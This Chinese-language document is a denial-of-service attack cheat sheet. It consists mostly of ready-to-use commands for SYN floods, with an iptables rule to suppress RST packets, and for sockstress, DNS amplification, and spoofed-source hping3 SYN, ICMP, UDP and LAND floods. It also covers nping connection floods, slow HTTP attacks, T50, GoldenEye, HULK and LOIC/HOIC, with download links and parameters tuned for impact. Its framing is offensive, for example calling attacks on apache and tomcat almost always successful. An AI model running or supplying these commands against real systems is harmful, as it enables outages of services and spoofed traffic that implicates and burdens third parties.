## Syn-Flood攻擊 syn_flood.py攻擊腳本（Linux下） ``` ./syn_flood.py -iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP -netstat -n I awk ‘/^ tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}‘ #Windows系統默認半開連接數10個,發一個包釋放一個連接，這種達不到攻擊郊果。 #要構成攻擊效果可以通過iptables限止發送RST包。這樣就可以達到攻擊郊果。iptables寫法如下： #iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.21.117 -j DROP ``` scapy工具（Linux下） ``` #安裝scapy相關組件 apt-get install python-gnuplot #使用方法： – i=IP() 定義i變量（注意IP大小寫，一定要大寫） – i.display() 顯示ip包頭用法 – i.dst=“1.1.1.1” 目的地址 – t=TCP() 采用tcp協議發包 – t.display () 查看用法 – t.dport=3389 攻擊遠程3389端口 – sr1(i/t,verbose=1,timeout=3) 發送數據包（） – sr1(IP(dst=1.1.1.1)/TCP()) ``` windows下使用fastsend 驗證：攻擊之后可以用cmd命令 netstat -an查看效果 是否出現close-wait ## sockstress攻防 Python攻擊腳本 ``` ./sicjstress.py 1.1.1.1 21 100 ``` C攻擊腳本 ``` https://github.com/defuse/sockstress -gcc -Wall -c sockstress.c -gcc -pthread -o sockstress sockstress.o ``` ``` #直接攻擊端口 ./sockstress 1.1.1.1:80 eth0 #攻擊站點 ./sockstress 1.1.1.1:80 eth0 -p payloads/http #-d是微秒內指定，默認為1000000 改成10之后并發帶度更快。 #添加防火墻規則 iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP ``` ## DNS放大攻擊 kali中使用 digANYhp.com @202.106.0.20 (流量放大約8倍） 攻擊原理 偽造源地址為被攻擊目標地址，向遞歸域名查詢服務器發起查詢 DNS服務器成為流量放大和實施攻擊者，大量DNS服務器實現DDoS ## 應用層攻擊 低帶寬應用層慢速DoS攻擊 Slowhttptest，最早由Python編寫，跨平臺支持（Linux、win、Cygwin、OSX) 尤其擅長攻擊apache、tomcat (幾乎百發百中) 攻擊方法 1. Slowloris 特點:完整的http請求結尾是\r\n\r\n，攻擊發\r\n… 2. Slow HTTP POST Slow POST: HTTP頭content-length聲明長度，但body部分緩慢發送 3. Slow Read attack攻擊 與slowloris and slow POST目的相同，都是耗盡應用的并發連接池 不同之處在于請求正常發送，但慢速讀取響應數據 攻擊者調整TCP window窗口大小，是服務器慢速返回數據 4. Apache Range Header attack 客戶端傳輸大文件時，體積查過HTTP Body大小限制時進行分段 耗盡服務器CPU、內存資源 ## 其他拒絕服務攻擊攻防總結 ### Kali自帶拒絕服務攻擊工具Hping3 幾乎可以定制發送任何TCP/IP數據包，用于測試FW、端口掃描、性能測試 ``` Syn Flood 攻擊 hping3 -c 1000 -d 120 -S -w 64 -p 80 - -flood - -rand-source 1.1.1.1 hping3 -S -P -U -p 80 - -flood - -rand-source 1.1.1.1 hping3 -SARFUP -p 80 - -flood - -rand-source 1.1.1.1 (TCP Flood) #ICMP Flood 攻擊 hping3 -q -n -a 1.1.1.1 - -icmp -d 56 - -flood 1.1.1.2 #補充兩個參數 --rand-source 用公網隨機地址進行攻擊 -a 1.1.1.1 偽造成1.1.1.1進行攻擊 #詳細幫助文檔：http://cnhotfire.blog.51cto.com/2042323/698362/ #UDP Flood 攻擊 hping3 -a 1.1.1.1 - -udp -s 53 -d 100 -p 53 - -flood 1.1.1.2 #LAND攻擊，特殊種類的SYN Flood攻擊，源地址、目的地址都是受害者，受害者于自己完成三次握手 hping3 -n –a 1.1.1.1 -S -d 100 -p 80 –flood 1.1.1.1 LAND攻者是偽造的源地址和要攻擊目標地址是同一個地址，也就是說自己與自己建立連接。可用tcpdump –I eth0 –s 0 –vv查看 ``` ### TCP全鏈接DoS攻擊nping ``` nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1 //--rate=100000 一次建10000個連接，-C是一共建1000000000連接。 #查公網IP -nping - -echo-client "public" echo.nmap.org - -udp ``` ### Siege http/https壓力測試工具，模擬多個用戶并發訪問請求 —siege ``` siege -g http://1.1.1.1/a.php //掃描網站banner信息 siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp -vv ``` 同時攻擊多個url，使用-f調用字典文件 /etc/siege/urls.txt,也可以直接 編輯urls.txt把要攻擊的地址放進去直接使用siege –i –c 1000 -vv就可以攻擊 Siege攻擊一般用作并發量、性能測試，多用戶并發訪問測試。開發上線一般都會經過這步。 ``` siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp //10000用戶并發， -A代表指紋信息，可隨便填定。 ``` 一般用golden eye代替，后面有 ### T50網絡壓力測試 ``` t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80 t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22 ``` ### Nmap ``` grep dos /usr/share/nmap/scripts/script.db |cut -d “”" -f 2 ``` ### 其他拒絕服務攻擊 * XOIC:https://xoicdoser.wordpress.com/ 攻擊任意IP地址的指定端口 ``` git clone git://git.code.sf.net/p/xoic/code xoic-code #三種模式：test、normal、DoS Attack #支持協議：TCP/HTTP/UDP/ICMP ``` * DDOSIM 7層拒絕服務工具（模擬多個僵尸機） 隨機IP地址 一基于TCP連接的攻擊 -應用層DDoS攻擊 正常的HTTP請求、非正常的HTTP請求式DDoS -SMTP DDoS 隨機端口的TCP連接洪水 * GoldenEye http/https拒絕服務攻擊工具 安全研究為目的Python腳本 隨機攻擊向量，keep-alive，避免緩存命中 ``` wget https://github.com/jseidl/GoldenEye/archive/master.zip unzip master.zip ./goldeneye.py http://1.1.1.1 -w 50 goldeneye.py http://1.1.1.1 -w 50 –m random //-w 50 代表50個人 ，-s 500代表每個人500個，50*500打25000個鏈接。 ``` * HULK:Python腳本 隨機產生大量唯一的地址請求，避免緩存命中,耗盡WEB服務器資源池 https://packetstormsecurity.com/files/download/112856/hulk.zip * 匿名者攻擊工具 匿名者發布的一些DoS工具 LOIC HOIC DDoSer